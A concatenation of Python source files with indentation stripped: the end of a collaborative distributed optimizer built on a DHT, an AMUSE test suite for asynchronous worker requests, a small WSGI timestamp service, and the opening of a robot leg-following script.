logger.log(self.status_loglevel, f"Beginning global optimizer step #{self.collaboration_state.optimizer_step}")
self.collaboration_state = self._fetch_state()
self.collaboration_state_updated.set()
with self.lock_collaboration_state:
current_step, group_info = self.averager.local_step, None
try:
group_info = self.averager.step(timeout=self.averaging_timeout, gather=current_step, **kwargs)
if group_info:
logger.log(self.status_loglevel, f"Averaged tensors successfully with {len(group_info)} peers")
# update our current step if we averaged with another peer that was at a more recent step
for peer, peer_step in group_info.items():
if isinstance(peer_step, int):
current_step = max(current_step, peer_step)
else:
logger.warning(f"Peer {peer} sent malformed data about current step: {peer_step}")
except BaseException as e:
logger.log(self.status_loglevel, f"Skipped averaging: averaging round failed with {repr(e)}")
self.collaboration_state.register_step(current_step + 1)
self.averager.local_step = current_step + 1
self.collaboration_state_updated.set()
logger.log(self.status_loglevel, f"Optimizer step: done!")
return group_info
def _grad_buffers(self) -> Iterator[torch.Tensor]:
"""pytorch-internal gradient buffers"""
for param_group in self.opt.param_groups:
for param in param_group["params"]:
if param.grad is None:
yield torch.zeros_like(param)
else:
yield param.grad
@torch.no_grad()
def accumulated_grads(self) -> Iterator[torch.Tensor]:
"""local gradient accumulators"""
if self.reuse_grad_buffers:
yield from self._grad_buffers()
return
if self._grads is None:
self._grads = [torch.zeros_like(grad, device=self.accumulate_grads_on) for grad in self._grad_buffers()]
yield from self._grads
@torch.no_grad()
def accumulate_grads_(self, batch_size: int):
"""add current gradients to grad accumulators (if any)"""
if self.reuse_grad_buffers:
# user is responsible for accumulating gradients in .grad buffers
assert batch_size == self.batch_size_per_step, "Custom batch size is not supported if reuse_grad_buffers"
else:
alpha = float(batch_size) / self.batch_size_per_step
for grad_buf, grad_acc in zip(self._grad_buffers(), self.accumulated_grads()):
grad_acc.add_(grad_buf.to(grad_acc.device), alpha=alpha)
@torch.no_grad()
def apply_accumulated_grads_(self, scale_by: Optional[float] = None):
if not self.reuse_grad_buffers:
for grad_buf, grad_acc in zip(self._grad_buffers(), self.accumulated_grads()):
grad_buf.copy_(grad_acc.to(grad_buf.device), non_blocking=True)
if scale_by is not None:
for grad_buf in self._grad_buffers():
grad_buf.mul_(scale_by)
@torch.no_grad()
def reset_accumulated_grads_(self):
for grad_buf in self.accumulated_grads():
grad_buf.zero_()
def report_training_progress(self):
"""Periodically publish metadata and the current number of samples accumulated towards the next step"""
while self.is_alive():
self.should_report_progress.wait()
self.should_report_progress.clear()
with self.lock_local_progress:
current_time = get_dht_time()
local_state_info = TrainingState(
peer_id=self.averager.peer_id.to_bytes(),
step=self.local_step,
samples_accumulated=self.local_samples_accumulated,
samples_per_second=self.performance_ema.samples_per_second,
time=current_time,
client_mode=self.averager.client_mode,
)
self.dht.store(
key=self.training_progress_key,
subkey=self._local_public_key,
value=local_state_info.dict(),
expiration_time=current_time + self.metadata_expiration,
return_future=True,
)
def check_collaboration_state_periodically(self):
"""
Periodically check the training progress from all peers. Trigger update after target_batch_size total samples
"""
while self.is_alive():
time_to_next_update = max(0.0, self.collaboration_state.next_fetch_time - get_dht_time())
if self.collaboration_state_updated.wait(time_to_next_update):
self.collaboration_state_updated.clear()
continue # if state was updated externally, reset timer
with self.lock_collaboration_state:
self.collaboration_state = self._fetch_state()
def _fetch_state(self) -> CollaborationState:
"""Read performance statistics reported by peers, estimate progress towards next batch"""
response, _expiration = self.dht.get(self.training_progress_key, latest=True) or (None, -float("inf"))
current_time = get_dht_time()
if not isinstance(response, dict) or len(response) == 0:
logger.log(self.status_loglevel, f"Found no active peers: {response}")
samples_left_to_target_batch_size = max(0, self.target_batch_size - self.local_samples_accumulated)
local_eta_next_step = samples_left_to_target_batch_size / self.performance_ema.samples_per_second
return CollaborationState(
self.local_step,
self.local_samples_accumulated,
self.target_batch_size,
num_peers=0,
num_clients=0,
eta_next_step=current_time + local_eta_next_step,
next_fetch_time=current_time + self.default_refresh_period,
)
valid_peer_states = [
TrainingState.parse_obj(peer_state.value)
for peer_state in response.values()
if peer_state.value is not None
]
num_peers = len(valid_peer_states)
num_clients = sum(state.client_mode for state in valid_peer_states)
global_optimizer_step = self.local_step
for state in valid_peer_states:
if not state.client_mode:
global_optimizer_step = max(global_optimizer_step, state.step)
total_samples_accumulated = estimated_current_samples = total_samples_per_second = 0
for state in valid_peer_states:
total_samples_per_second += state.samples_per_second
if state.step == global_optimizer_step:
total_samples_accumulated += state.samples_accumulated
estimated_current_samples += (
state.samples_accumulated + max(0, current_time - state.time) * state.samples_per_second
)
# note: we deliberately count only valid peers for samples_accumulated, but all peers for performance;
# the rationale behind this is that outdated peers will synchronize and begin contributing shortly.
estimated_samples_remaining = self.target_batch_size - estimated_current_samples
estimated_time_to_next_step = max(0, estimated_samples_remaining) / total_samples_per_second
expected_max_peers = max(num_peers + self.expected_drift_peers, num_peers * (1 + self.expected_drift_rate))
time_to_next_fetch = float(
np.clip(
a=estimated_time_to_next_step * num_peers / expected_max_peers,
a_min=self.min_refresh_period,
a_max=self.max_refresh_period,
)
)
logger.log(
self.status_loglevel,
f"{self.prefix} accumulated {total_samples_accumulated} samples from "
f"{num_peers} peers for step #{global_optimizer_step}. "
f"ETA {estimated_time_to_next_step:.2f} sec (refresh in {time_to_next_fetch:.2f} sec)",
)
return CollaborationState(
global_optimizer_step,
total_samples_accumulated,
target_batch_size=self.target_batch_size,
num_peers=num_peers,
num_clients=num_clients,
eta_next_step=current_time + estimated_time_to_next_step,
next_fetch_time=current_time + time_to_next_fetch,
)
def zero_grad(self, *args, **kwargs):
if self.reuse_grad_buffers:
raise ValueError(
f"When running {self.__class__.__name__} with reuse_grad_buffers=True, user should never "
f"call zero_grad manually. Gradients will be refreshed internally."
)
return self.opt.zero_grad(*args, **kwargs)
def update_scheduler(self):
if self.scheduler:
while self.scheduler._step_count < self.local_step:
self.scheduler.step()
def shutdown(self):
logger.debug("Shutting down averager...")
self.averager.shutdown()
logger.debug("Sending goodbye to peers...")
self.dht.store(
self.training_progress_key,
subkey=self._local_public_key,
value=None,
expiration_time=get_dht_time() + self.metadata_expiration,
)
logger.debug(f"{self.__class__.__name__} is shut down")
def __del__(self):
self.shutdown()
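# Hedged usage sketch, not part of the original module: wiring CollaborativeOptimizer into
# an ordinary training loop. The model, dataloader, DHT peers and hyperparameters are
# supplied by the caller or chosen as illustrative placeholders; for new projects the class
# docstring above recommends hivemind.Optimizer instead.
import torch

def train_collaboratively(model, dataloader, dht, max_steps=1000):
    opt = CollaborativeOptimizer(
        torch.optim.Adam(model.parameters(), lr=1e-3),
        dht=dht,
        prefix="my_experiment",
        target_batch_size=4096,
        batch_size_per_step=32,
        reuse_grad_buffers=True,  # gradients accumulate in .grad; do not call zero_grad()
        verbose=True,
    )
    for step, batch in enumerate(dataloader):
        loss = model(batch).mean()
        loss.backward()
        opt.step()  # parameters only update once the collaboration reaches target_batch_size
        if step + 1 >= max_steps:
            break
    opt.shutdown()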
|
test_async.py
|
from amuse.support.interface import InCodeComponentImplementation
from amuse.test.amusetest import TestWithMPI
from amuse.support import exceptions
from amuse.support import options
import os
import time
from amuse.units import nbody_system
from amuse.units import units
from amuse import datamodel
from amuse.rfi.tools import create_c
from amuse.rfi import async_request
from amuse.rfi.core import *
import test_c_implementation
from amuse.test import compile_tools
from amuse.community.distributed.interface import DistributedAmuse, Pilot
codestring=test_c_implementation.codestring+"""
#include <unistd.h>
float _x[10] = { 1., 2., 3., 4., 5., 6., 7., 8., 9., 10.};
int do_sleep(int in) {
sleep(in);
return 0;
}
int return_error(int * out) {
*out=123;
return -1;
}
int get_x(int in, float *x){
*x=_x[in];
return 0;
}
int set_x(int in, float x){
_x[in]=x;
return 0;
}
int dummy(){
return 0;
}
"""
class ForTestingInterface(test_c_implementation.ForTestingInterface):
@legacy_function
def do_sleep():
function = LegacyFunctionSpecification()
function.addParameter('int_in', dtype='int32', direction=function.IN)
function.result_type = 'int32'
return function
@legacy_function
def return_error():
function = LegacyFunctionSpecification()
function.addParameter('out', dtype='int32', direction=function.OUT)
function.result_type = 'int32'
return function
@legacy_function
def echo_2_int():
function = LegacyFunctionSpecification()
function.addParameter('int_in1', dtype='int32', direction=function.IN, unit=units.m)
function.addParameter('int_in2', dtype='int32', direction=function.IN, default = 1, unit=units.kg)
function.addParameter('int_out1', dtype='int32', direction=function.OUT, unit=units.m)
function.addParameter('int_out2', dtype='int32', direction=function.OUT, unit=units.kg)
function.addParameter('len', dtype='int32', direction=function.LENGTH)
function.result_type = 'int32'
function.must_handle_array = True
return function
@legacy_function
def get_x():
function = LegacyFunctionSpecification()
function.addParameter('index', dtype='int32', direction=function.IN)
function.addParameter('x', dtype='float32', direction=function.OUT, unit=units.m)
function.result_type = 'int32'
function.can_handle_array = True
return function
@legacy_function
def set_x():
function = LegacyFunctionSpecification()
function.addParameter('index', dtype='int32', direction=function.IN)
function.addParameter('x', dtype='float32', direction=function.IN, unit=units.m)
function.result_type = 'int32'
function.can_handle_array = True
return function
@legacy_function
def dummy():
function = LegacyFunctionSpecification()
function.result_type = 'int32'
return function
class ForTesting(InCodeComponentImplementation):
def __init__(self, exefile, **options):
InCodeComponentImplementation.__init__(self, ForTestingInterface(exefile, **options), **options)
def get_grid_range(self):
return (0,9)
def define_grids(self, handler):
handler.define_grid('grid')
handler.set_grid_range('grid', 'get_grid_range')
handler.add_getter('grid', 'get_x', names=["x"])
handler.add_setter('grid', 'set_x', names=["x"])
class ForTestingWithState(ForTesting):
def define_state(self, handler):
handler.set_initial_state("1")
handler.add_transition("1", "2", "dummy")
handler.add_method("2", "get_x")
handler.add_method("2", "set_x")
class TestASync(TestWithMPI):
@classmethod
def setup_class(cls):
print("building...")
cls.check_can_compile_modules()
try:
cls.exefile = compile_tools.build_worker(codestring, cls.get_path_to_results(), ForTestingInterface)
except Exception as ex:
print(ex)
raise
print("done")
def test1(self):
instance = ForTestingInterface(self.exefile)
int_out, error = instance.echo_int(10)
instance.stop()
self.assertEquals(int_out, 10)
self.assertEquals(error, 0)
def test2(self):
instance = ForTestingInterface(self.exefile)
request = instance.echo_int.asynchronous(10)
self.assertEqual(request, instance.async_request)
request.wait()
int_out,error=request.result()
self.assertEquals(int_out, 10)
self.assertEquals(error, 0)
instance.stop()
def test3(self):
instance = ForTestingInterface(self.exefile)
request1 = instance.do_sleep.asynchronous(1)
request2 = instance.echo_int.asynchronous(10)
self.assertEqual(request2, instance.async_request)
request2.wait()
int_out,error=request2.result()
self.assertEquals(int_out, 10)
self.assertEquals(error, 0)
instance.stop()
def test4(self):
instance = ForTesting(self.exefile)
request1 = instance.do_sleep(1, return_request=True)
request2 = instance.echo_int(10, return_request=True)
self.assertEqual(request2, instance.async_request)
instance.async_request.wait()
int_out=request2.result()
self.assertEquals(int_out, 10)
instance.stop()
def test5(self):
instance = ForTesting(self.exefile)
instance.do_sleep(1, return_request=True)
requests=[]
for x in range(10):
requests.append(instance.echo_int(x, return_request=True))
instance.async_request.wait()
for i,x in enumerate(requests):
self.assertEquals(x.result(), i)
instance.stop()
def test6(self):
instance = ForTesting(self.exefile)
requests=[]
for x in range(10):
requests.append(instance.echo_int(x, return_request=True))
instance.async_request.wait()
for i,x in enumerate(requests):
self.assertEquals(x.result(), i)
instance.stop()
def test7(self):
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
t1=time.time()
requests=[]
for x in range(10):
requests.append([instance1.echo_int(x, return_request=True),x])
for x in range(10):
requests.append([instance2.echo_int(x, return_request=True),x])
instance1.do_sleep(1, return_request=True)
instance2.do_sleep(1, return_request=True)
pool=instance1.async_request.join(instance2.async_request)
pool.waitall()
t2=time.time()
for x in requests:
self.assertEquals(x[0].result(), x[1])
instance1.stop()
instance2.stop()
self.assertTrue(t2-t1 < 2.)
def test8(self):
from threading import Thread
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
t1=time.time()
requests=[]
for x in range(10):
requests.append([instance1.echo_int(x, return_request=True),x])
for x in range(10):
requests.append([instance2.echo_int(x, return_request=True),x])
instance1.do_sleep(1, return_request=True)
instance2.do_sleep(1, return_request=True)
pool=instance1.async_request.join(instance2.async_request)
thread=Thread(target=pool.waitall)
thread.start()
time.sleep(1)
thread.join()
self.assertTrue(pool)
t2=time.time()
for x in requests:
self.assertEquals(x[0].result(), x[1])
instance1.stop()
instance2.stop()
self.assertTrue(t2-t1 < 2.)
def test9(self):
instance = ForTesting(self.exefile)
for x in range(10):
instance.echo_int(x, return_request=True)
results=instance.async_request.results
self.assertEquals(results, range(10))
instance.stop()
def test10(self):
instance = ForTesting(self.exefile)
r1=instance.do_sleep(1, return_request=True)
r2=instance.return_error( return_request=True)
r3=instance.echo_int(1, return_request=True)
r4=instance.echo_int(2, return_request=True)
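        # waitall() should raise because return_error fails; requests queued after it finish but without results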
self.assertRaises(Exception, instance.async_request.waitall,
expected_message="Error in dependent call: Error when calling 'return_error' of a 'ForTesting', errorcode is -1")
self.assertTrue( r1.is_result_available() )
self.assertFalse( r2.is_result_available() )
self.assertTrue( r2.is_finished )
self.assertTrue( r3.is_finished )
self.assertFalse( bool(r3) )
self.assertTrue( r4.is_finished )
self.assertTrue( r4.waits_for() is None )
self.assertFalse( r3.is_result_available() )
instance.stop()
def test11(self):
""" cross dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
def fac():
return instance2.echo_int(20, return_request=True)
#~ request2=instance2.echo_int(20, async_dependency=request1)
request2=async_request.DependentASyncRequest(request1, fac)
request2.wait()
self.assertEqual(request2.result(),20)
instance1.stop()
instance2.stop()
def test11b(self):
""" cross dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
request2=instance2.echo_int(20, async_dependency=request1, return_request=True)
request2.wait()
self.assertTrue(request1.is_result_available())
self.assertEqual(request2.result(),20)
instance1.stop()
instance2.stop()
def test12(self):
""" cross dependency with input-output dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
results=dict()
def safe_result(arg, index):
result=arg()
results[index]=result
return result
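        # register a result handler so request1's value is stashed in results[1] for fac() to forward to instance2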
request1.add_result_handler(safe_result,(1,))
def fac():
return instance2.echo_int(results[1], return_request=True)
#~ request2=instance2.echo_int(??, async_factory=fac)
request2=async_request.DependentASyncRequest(request1, fac)
request2.wait()
self.assertEqual( request2.result(), 10)
instance1.stop()
instance2.stop()
def test12b(self):
""" cross dependency with input-output dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
request2=instance2.echo_int(request1, return_request=True)
request2.wait()
self.assertEqual( request2.result(), 10)
instance1.stop()
instance2.stop()
def test12c(self):
""" cross dependency with input-output dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_2_int(1 | units.m , 2 | units.kg, return_request=True)
request2=instance2.echo_2_int(request1[0], request1[1], return_request=True)
        print("do...wait...")
        request2.wait()
        print("done", request2.result())
self.assertEqual( request2.result()[0], 1 | units.m)
self.assertEqual( request2.result()[1], 2 | units.kg)
instance1.stop()
instance2.stop()
    def test12d(self):
""" cross dependency with input-output dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance3 = ForTesting(self.exefile)
instance4 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_2_int(1 | units.m , 2 | units.kg, return_request=True)
request1b=instance1.do_sleep(1, return_request=True)
request2=instance2.echo_2_int(3 | units.m , 4 | units.kg, return_request=True)
request3=instance3.echo_2_int(request2[0] , 5 | units.kg, return_request=True)
instance4.do_sleep(1, return_request=True)
request4=instance4.echo_2_int(request2[0], request3[1], return_request=True, async_dependency=request1b)
request3.wait()
self.assertEqual( request4.result()[0], 3 | units.m)
self.assertEqual( request4.result()[1], 5 | units.kg)
instance1.stop()
instance2.stop()
instance3.stop()
instance4.stop()
def test13(self):
instance = ForTesting(self.exefile)
r=instance.echo_int(1, return_request=True)
time.sleep(0.1)
self.assertTrue(r.is_result_available())
r.result()
r=instance.return_error(return_request=True)
time.sleep(0.1)
self.assertTrue(r.is_result_available())
self.assertTrue(r.is_result_available())
self.assertRaises(Exception, r.result, expected_message="Error when calling 'return_error' of a 'ForTesting', errorcode is -1")
self.assertFalse(r.is_result_available())
self.assertTrue(r.is_finished)
instance.stop()
def test14(self):
instance = ForTesting(self.exefile, channel_type="sockets")
r=instance.echo_int(1, return_request=True)
time.sleep(0.1)
self.assertTrue(r.is_result_available())
r.result()
r=instance.return_error(return_request=True)
time.sleep(0.1)
self.assertTrue(r.is_result_available())
self.assertTrue(r.is_result_available())
self.assertRaises(Exception, r.result, expected_message="Error when calling 'return_error' of a 'ForTesting', errorcode is -1")
self.assertFalse(r.is_result_available())
self.assertTrue(r.is_finished)
instance.stop()
def test15(self):
instance = ForTesting(self.exefile)
instance.do_sleep(1, return_request=True)
instance.return_error( return_request=True)
instance.echo_int(1, return_request=True)
instance.echo_int(1, return_request=True)
#~ self.assertRinstance.echo_int(1)
instance.stop()
def test16(self):
instance = ForTesting(self.exefile)
instance.do_sleep(1, return_request=True)
result=instance.echo_2_int([11,12,13] | units.m,[3,2,1]| units.kg, return_request=True)
r1=result[0]
r2=result[1]
self.assertEquals(r1.result(),[11,12,13] | units.m)
self.assertEquals(r2.result(),[3,2,1] | units.kg)
instance.stop()
def test17(self):
instance = ForTestingInterface(self.exefile)
instance.do_sleep.asynchronous(1)
request=instance.echo_2_int.asynchronous([11,12,13],[3,2,1])
r1=request["int_out1"]
r2=request["int_out2"]
self.assertEquals(r1.result(),[11,12,13] )
self.assertEquals(r2.result(),[3,2,1] )
instance.stop()
    def test18(self):
        """ test pool as dependency 1 """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance3 = ForTesting(self.exefile)
request0=instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
request2=instance2.echo_int(10, return_request=True)
request=async_request.AsyncRequestsPool(request1,request2)
request3=instance3.echo_int(11, async_dependency=request, return_request=True)
request3.wait()
self.assertTrue(request1.is_result_available())
self.assertTrue(request2.is_result_available())
self.assertEqual( request3.result(), 11)
instance1.stop()
instance2.stop()
instance3.stop()
    def test18b(self):
        """ test pool as dependency 2 """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance3 = ForTesting(self.exefile)
request0=instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
request2=instance1.echo_int(10, return_request=True)
request=async_request.AsyncRequestsPool(request1,request2)
request3=instance3.echo_int(11, async_dependency=request, return_request=True)
request3.wait()
self.assertTrue(request1.is_result_available())
self.assertTrue(request2.is_result_available())
self.assertEqual( request3.result(), 11)
instance1.stop()
instance2.stop()
instance3.stop()
def test19(self):
""" test sum request """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
r1=instance1.echo_int(1, return_request=True)
r2=instance2.echo_int(2, return_request=True)
s=r1+r2
r1=instance1.echo_int(2, return_request=True)
r2=instance2.echo_int(3, return_request=True)
m=r1*r2
r1=instance1.echo_int(12, return_request=True)
r2=instance2.echo_int(3, return_request=True)
d=r1/r2
self.assertEqual( s.result(), 3)
self.assertEqual( m.result(), 6)
self.assertEqual( d.result(), 4)
instance1.stop()
instance2.stop()
def test19b(self):
""" test sum request """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
r1=instance1.echo_int(1, return_request=True)
s=r1+2
r1=instance1.echo_int(2, return_request=True)
m=r1*3
r2=instance2.echo_int(3, return_request=True)
d=12/r2
self.assertEqual( s.result(), 3)
self.assertEqual( m.result(), 6)
self.assertEqual( d.result(), 4)
instance1.stop()
instance2.stop()
def test20(self):
""" some more tests of request expressions """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance3 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_2_int(1 | units.m , 2 | units.kg, return_request=True)
request2=instance2.echo_2_int(4 | units.m , 6 | units.kg, return_request=True)
request3a=instance3.echo_int(request2[0] / request1[0]-4, return_request=True)
request3b=instance3.echo_int(request2[1] / request1[1]-3, return_request=True)
request3a.wait()
request3b.wait()
self.assertEqual( request3a.result(), 0 )
self.assertEqual( request3b.result(), 0 )
instance1.stop()
instance2.stop()
instance3.stop()
def test21(self):
""" test sum request, sockets """
instance1 = ForTesting(self.exefile, channel_type="sockets")
instance2 = ForTesting(self.exefile, channel_type="sockets")
instance1.do_sleep(1, return_request=True)
r1=instance1.echo_int(1, return_request=True)
r2=instance2.echo_int(2, return_request=True)
s=r1+r2
r1=instance1.echo_int(2, return_request=True)
r2=instance2.echo_int(3, return_request=True)
m=r1*r2
r1=instance1.echo_int(12, return_request=True)
r2=instance2.echo_int(3, return_request=True)
d=r1/r2
self.assertEqual( s.result(), 3)
self.assertEqual( m.result(), 6)
self.assertEqual( d.result(), 4)
instance1.stop()
instance2.stop()
    def test21b(self):
""" some more tests of request expressions """
instance1 = ForTesting(self.exefile)
a=[10,30,15] | units.m
b=[1,3,5] | units.kg
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_2_int(a , b, return_request=True)
request2=(3*request1[1]/(2.*request1[0])+(55. | units.kg/units.m))
self.assertEquals( request2.result(), (3*b/(2.*a)+(55. | units.kg/units.m)) )
instance1.stop()
def test22(self):
""" tests of unpack """
instance1 = ForTesting(self.exefile)
a=[10,30,15] | units.m
b=[1,3,5] | units.kg
#~ instance1.do_sleep(1, return_request=True)
a_,b_=instance1.echo_2_int(a , b, return_request=True)
self.assertEquals( (3*b_/(2.*a_)+(55. | units.kg/units.m)).result(), (3*b/(2.*a)+(55. | units.kg/units.m)) )
instance1.stop()
def test23(self):
""" tests of unpack """
instance1 = ForTestingInterface(self.exefile)
a=[10,30,15]
b=[1,3,5]
#~ instance1.do_sleep(1, return_request=True)
res=instance1.echo_2_int.asynchronous(a,b)
#~ res=res['int_out1']
a_,b_, err= res
self.assertEquals( a,a_.result() )
self.assertEquals( b,b_.result() )
instance1.stop()
def test24(self):
""" more test of pool """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
r1=instance1.echo_int(1, return_request=True)
r2=instance1.echo_int(2, return_request=True)
r3=instance2.echo_int(3, return_request=True)
r4=instance2.echo_int(4, return_request=True)
p1=r1.join(r3)
p2=r2.join(r4)
p3=p1.join(p2)
self.assertTrue(p3 is p1)
p3.waitall()
self.assertEqual(r1.result(), 1)
self.assertEqual(r2.result(), 2)
self.assertEqual(r3.result(), 3)
self.assertEqual(r4.result(), 4)
instance1.stop()
instance2.stop()
def test25(self):
""" more test of pool: calls of same code """
from amuse.rfi.async_request import AsyncRequestsPool
instance1 = ForTesting(self.exefile)
r1=instance1.do_sleep(1, return_request=True)
r2=instance1.echo_int(2, return_request=True)
p1=AsyncRequestsPool()
r1.wait()
r2.wait()
p1.add_request(r1)
p1.add_request(r2)
#~ p1=r1.join(r2)
p1.waitall()
self.assertEqual(r2.result(), 2)
instance1.stop()
def test30(self):
""" test a grid attribute request """
instance1 = ForTesting(self.exefile, redirection="none")
self.assertEquals(instance1.grid.x, numpy.arange(1,11) |units.m)
instance1.do_sleep(1, return_request=True)
t1=time.time()
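        # building the request should return immediately; result() blocks until the 1 s sleep has finished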
request=instance1.grid.request.x
t2=time.time()
self.assertLess(t2-t1, 0.5)
self.assertEquals(request.result(), numpy.arange(1,11) | units.m)
t2=time.time()
self.assertGreater(t2-t1, 1.)
def test31(self):
""" test a grid attribute request, subgrids """
instance1 = ForTesting(self.exefile, redirection="none")
self.assertEquals(instance1.grid.x, numpy.arange(1,11) |units.m)
instance1.do_sleep(1, return_request=True)
t1=time.time()
request=instance1.grid[:5].request.x
request2=instance1.grid[5:].request.x
t2=time.time()
self.assertLess(t2-t1, 0.5)
self.assertEquals(request.result(), numpy.arange(1,6) | units.m)
self.assertEquals(request2.result(), numpy.arange(6,11) | units.m)
t2=time.time()
self.assertGreater(t2-t1, 1.)
def test32(self):
""" test a grid attribute request setter """
instance1 = ForTesting(self.exefile, redirection="none")
instance1.grid.x=(66.+numpy.arange(1,11)) |units.m
self.assertEquals(instance1.grid.x, (66.+numpy.arange(1,11)) |units.m)
t1=time.time()
instance1.do_sleep(1, return_request=True)
instance1.grid.request.x=(11.+numpy.arange(1,11)) |units.m
t2=time.time()
self.assertLess(t2-t1, 0.5)
instance1.async_request.wait()
t2=time.time()
self.assertGreater(t2-t1, 1.)
t1=time.time()
self.assertEquals(instance1.grid.x, (11.+numpy.arange(1,11)) | units.m)
t2=time.time()
self.assertLess(t2-t1, 0.5)
def test33(self):
""" test a grid attribute request, subgrids """
instance1 = ForTesting(self.exefile, redirection="none")
self.assertEquals(instance1.grid.x, numpy.arange(1,11) |units.m)
t1=time.time()
instance1.do_sleep(1, return_request=True)
instance1.grid[::2].request.x=(11.+numpy.arange(1,11,2)) |units.m
t2=time.time()
self.assertLess(t2-t1, 0.5)
instance1.async_request.wait()
t2=time.time()
self.assertGreater(t2-t1, 1.)
self.assertEquals(instance1.grid.x[::2], (11.+numpy.arange(1,11,2)) | units.m)
self.assertEquals(instance1.grid.x[1::2], (numpy.arange(2,11,2)) | units.m)
def test34(self):
""" test a grid attribute request, subgrids """
instance1 = ForTesting(self.exefile, redirection="none")
grid=instance1.grid.copy()
request=instance1.grid.request.x
self.assertEquals(request.result(), numpy.arange(1,11) | units.m)
def test35(self):
""" test a grid attribute request setter with state"""
instance1 = ForTestingWithState(self.exefile, redirection="none")
t1=time.time()
instance1.do_sleep(1, return_request=True)
self.assertEquals(instance1.get_name_of_current_state(), '1')
instance1.grid.request.x=(11.+numpy.arange(1,11)) |units.m
self.assertEquals(instance1.get_name_of_current_state(), '2')
t2=time.time()
self.assertGreater(t2-t1, 1.) # first time, state calls dummy (blocking) -> wait
t1=time.time()
instance1.do_sleep(1, return_request=True)
instance1.grid.request.x=(12.+numpy.arange(1,11)) |units.m
t2=time.time()
self.assertLess(t2-t1, 0.5) # second time should be less
instance1.async_request.wait()
t2=time.time()
self.assertGreater(t2-t1, 1.)
t1=time.time()
self.assertEquals(instance1.grid.x, (12. +numpy.arange(1,11)) | units.m)
t2=time.time()
self.assertLess(t2-t1, 0.5)
def test36(self):
""" more state tests"""
instance1 = ForTestingWithState(self.exefile, redirection="none")
self.assertEquals(instance1.get_name_of_current_state(), '1')
# this documents current behaviour:
instance1.dummy(return_request=True)
self.assertEquals(instance1.get_name_of_current_state(), '1')
instance1.async_request.wait()
self.assertEquals(instance1.get_name_of_current_state(), '2')
# ie state changes upon completion of call at wait. This is
# sort of ok, alternatively state could be changed immediately...
class TestASyncDistributed(TestASync):
@classmethod
def setup_class(cls):
cls.check_not_in_mpiexec()
super(TestASyncDistributed, cls).setup_class()
cls.distinstance = cls.new_instance_of_an_optional_code(DistributedAmuse)#, redirection='none')
cls.distinstance.parameters.debug = False
#~ print "Resources:"
#~ print cls.distinstance.resources
pilot = Pilot()
pilot.resource_name='local'
pilot.node_count=1
pilot.time= 2|units.hour
pilot.slots_per_node=8
pilot.label='local'
cls.distinstance.pilots.add_pilot(pilot)
#~ print "Pilots:"
#~ print cls.distinstance.pilots
#~ print "Waiting for pilots"
cls.distinstance.wait_for_pilots()
cls.distinstance.use_for_all_workers()
@classmethod
def tearDown(cls):
#~ print "Stopping distributed code"
cls.distinstance.stop()
@classmethod
    def check_not_in_mpiexec(cls):
        """
        The tests fork another process; if the test run is itself
        an MPI process, the tests may fail. Under the hydra process
        manager they will fail, so skip the tests if we detect hydra.
        """
if 'HYDI_CONTROL_FD' in os.environ:
return
if 'HYDRA_CONTROL_FD' in os.environ or 'PMI_FD' in os.environ:
cls.skip('cannot run the socket tests under hydra process manager')
|
resilient-service.py
|
# -*- coding: utf-8 -*-
from datetime import datetime
import io
import os.path
import time
import threading
from wsgiref.validate import validator
from wsgiref.simple_server import make_server
EXCHANGE_FILE = "./exchange.dat"
def update_exchange_file():
"""
Writes the current date and time every 10 seconds into the exchange file.
The file is created if it does not exist.
"""
print("Will update the exchange file")
while True:
with io.open(EXCHANGE_FILE, "w") as f:
f.write(datetime.now().isoformat())
time.sleep(10)
def simple_app(environ, start_response):
"""
Read the contents of the exchange file and return it.
"""
if not os.path.exists(EXCHANGE_FILE):
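        # the updater thread has not yet written the exchange file; report the service as unavailable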
start_response(
'503 Service Unavailable',
[('Content-type', 'text/plain')]
)
return [b'Exchange file is not ready']
start_response('200 OK', [('Content-type', 'text/plain')])
with io.open(EXCHANGE_FILE) as f:
return [f.read().encode('utf-8')]
if __name__ == '__main__':
    t = threading.Thread(target=update_exchange_file)
    t.daemon = True  # let the process exit on Ctrl-C even though the updater loops forever
    t.start()
httpd = make_server('', 8080, simple_app)
print("Listening on port 8080....")
try:
httpd.serve_forever()
except KeyboardInterrupt:
httpd.shutdown()
t.join(timeout=1)
|
FrontFollowing.py
|
import numpy as np
import os,sys
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
data_path = os.path.abspath(
os.path.dirname(os.path.abspath(__file__)) + os.path.sep + ".." +
os.path.sep + "data")
import time
import threading
from Sensors import IRCamera, IMU
from Following.Preprocessing import Leg_detector
from Following.Network import FrontFollowingNetwork as FFL
from Driver import ControlOdometryDriver as cd
"""serial port device paths"""
camera_portal = '/dev/ttyUSB0'
lidar_portal = '/dev/ttyUSB3'
